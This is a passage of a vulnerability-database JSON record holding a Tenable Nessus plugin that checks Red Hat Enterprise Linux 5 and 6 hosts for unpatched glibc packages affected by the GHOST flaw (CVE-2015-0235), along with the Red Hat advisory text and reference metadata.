cpu:\"s390x\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", 
reference:\"nscd-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "title": "RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)", "type": "nessus", "viewCount": 2}, "differentElements": ["modified", "sourceData", "title"], "edition": 9, "lastseen": "2018-12-08T03:48:31"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc-static", "cpe:/o:redhat:enterprise_linux:6.5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "cpe:/o:redhat:enterprise_linux:5.9", "p-cpe:/a:redhat:enterprise_linux:glibc", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "cvelist": ["CVE-2015-0235"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. 
A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "b3dec0e87da1a779bae4a011b03b94753833e4199498271f8d23cb39a71c3ba4", "hashmap": [{"hash": "5f51513fe342d0d876d5e6133b2e7d91", "key": "sourceData"}, {"hash": "5a30b331c491a149b274795dcb31aa8e", "key": "description"}, {"hash": "7c03779312ffcb90b2c1d0c697a916c4", "key": "modified"}, {"hash": "841f459c9764bcdcd6d5a1955f15a6d5", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "3d8d634cf2d0899c0d90aff4e213fae6", "key": "published"}, {"hash": "e010fd952706847a7e7ec9bd37c23380", "key": "cpe"}, {"hash": "813366c4a714f890ad158fca7c40bbaf", "key": "pluginID"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "cbab536cd5fdc2c0e0d64b3cdab702d9", "key": "title"}, {"hash": "2091fc8b5268a0c4b492e97e601c3a5f", "key": 
"references"}, {"hash": "341a141f8365cdd9e626c9fa294e819c", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=81068", "id": "REDHAT-RHSA-2015-0099.NASL", "lastseen": "2018-08-30T19:48:13", "modified": "2018-07-26T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "81068", "published": "2015-01-29T00:00:00", "references": ["http://rhn.redhat.com/errata/RHSA-2015-0099.html", "https://www.redhat.com/security/data/cve/CVE-2015-0235.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0099. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81068);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/07/26 18:45:29\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"RHSA\", value:\"2015:0099\");\n\n script_name(english:\"RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux\n5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced\nUpdate Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended\nUpdate Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2015-0235.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2015-0099.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", 
\"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5\\.6|5\\.9|6\\.2|6\\.4|6\\.5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.6 / 5.9 / 6.2 / 6.4 / 6.5\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0099\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", 
cpu:\"x86_64\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-debuginfo-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-devel-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if 
(rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", 
cpu:\"s390x\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-devel-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-devel-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) 
flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-static-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-static-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", 
cpu:\"i686\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "title": "RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)", "type": "nessus", "viewCount": 2}, "differentElements": ["cvss"], "edition": 5, "lastseen": "2018-08-30T19:48:13"}], "edition": 13, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "d459846fc4189fab17e65d683fe5fd76"}, {"key": "cvelist", "hash": "841f459c9764bcdcd6d5a1955f15a6d5"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "5a30b331c491a149b274795dcb31aa8e"}, {"key": "href", "hash": "341a141f8365cdd9e626c9fa294e819c"}, {"key": "modified", "hash": "474125cf5a862fc9b9ffbcfbe9b44ef8"}, {"key": "naslFamily", "hash": "b46559ea68ec9a13474c3a7776817cfd"}, {"key": "pluginID", "hash": "813366c4a714f890ad158fca7c40bbaf"}, {"key": "published", "hash": "3d8d634cf2d0899c0d90aff4e213fae6"}, {"key": "references", "hash": 
"d724cd7c7bdb670117d239f0719c8bcd"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "ada315379c9f000e2e48a8928e6b3ddd"}, {"key": "title", "hash": "cbab536cd5fdc2c0e0d64b3cdab702d9"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "4033bbaec8ad559d4a05dce876a55d43df3780707feb91f697b172119e1b957d", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-0235"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:63DB340A742A21A8EFB20A9452A0EDD2"]}, {"type": "paloalto", "idList": ["PAN-SA-2015-0002"]}, {"type": "f5", "idList": ["F5:K16057", "SOL16057"]}, {"type": "vulnerlab", "idList": ["VULNERLAB:1430"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31672", "SECURITYVULNS:VULN:14240"]}, {"type": "freebsd", "idList": ["0765DE84-A6C1-11E4-A0C1-C485083CA99C", "F7A9E415-BDCA-11E4-970C-000C292EE6B8"]}, {"type": "redhat", "idList": ["RHSA-2015:0099", "RHSA-2015:0090", "RHSA-2015:0101", "RHSA-2015:0092"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/WORDPRESS_GHOST_SCANNER", "MSF:EXPLOIT/LINUX/SMTP/EXIM_GETHOSTBYNAME_BOF"]}, {"type": "nessus", "idList": ["ORACLELINUX_ELSA-2015-0092.NASL", "CISCO_CUCM_CSCUS66650-GHOST.NASL", "MANDRIVA_MDVSA-2015-039.NASL", "F5_BIGIP_SOL16057.NASL", "REDHAT-RHSA-2015-0092.NASL", "ALA_ALAS-2015-473.NASL", "SLACKWARE_SSA_2015-028-01.NASL", "ORACLELINUX_ELSA-2015-0090.NASL", "FREEBSD_PKG_0765DE84A6C111E4A0C1C485083CA99C.NASL", "REDHAT-RHSA-2015-0090.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310123197", "OPENVAS:1361412562310123196", "OPENVAS:1361412562310850633", "OPENVAS:1361412562310105188", "OPENVAS:1361412562310120286", "OPENVAS:1361412562310850839", "OPENVAS:1361412562310882109", "OPENVAS:1361412562310871307", "OPENVAS:1361412562310882108", "OPENVAS:1361412562310882107"]}, {"type": "seebug", "idList": ["SSV:89237"]}, {"type": "thn", "idList": ["THN:3DD8F9ADFFEB290F33825414D41B0F41", 
"THN:A649F4ABCE9B99052139693A13D95B14", "THN:ACBFC80659E47A5B7C81B99570749679"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20150226-01-GLIBC"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:130115", "PACKETSTORM:130974", "PACKETSTORM:130171"]}, {"type": "exploitdb", "idList": ["EDB-ID:36421", "EDB-ID:35951"]}, {"type": "centos", "idList": ["CESA-2015:0092", "CESA-2015:0090"]}, {"type": "suse", "idList": ["SUSE-SU-2015:0158-1", "OPENSUSE-SU-2015:0162-1", "OPENSUSE-SU-2015:0184-1"]}, {"type": "cert", "idList": ["VU:967332"]}, {"type": "threatpost", "idList": ["THREATPOST:8B5C2D5280CC957CA9A4CB0C697F96D8", "THREATPOST:3A858BD40E6943BD3F4553301036091D"]}, {"type": "cisco", "idList": ["CISCO-SA-20150128-GHOST"]}, {"type": "oraclelinux", "idList": ["ELSA-2015-0101", "ELSA-2015-0090", "ELSA-2015-1627"]}, {"type": "debian", "idList": ["DEBIAN:DLA-139-1:5734D"]}, {"type": "amazon", "idList": ["ALAS-2015-473", "ALAS-2015-493"]}, {"type": "zdt", "idList": ["1337DAY-ID-23392", "1337DAY-ID-23215"]}, {"type": "slackware", "idList": ["SSA-2015-028-01"]}, {"type": "lenovo", "idList": ["LENOVO:PS500043-NOSID"]}, {"type": "ubuntu", "idList": ["USN-2485-1"]}, {"type": "ics", "idList": ["ICSA-15-064-01A"]}], "modified": "2019-02-21T01:23:24"}, "score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0099. 
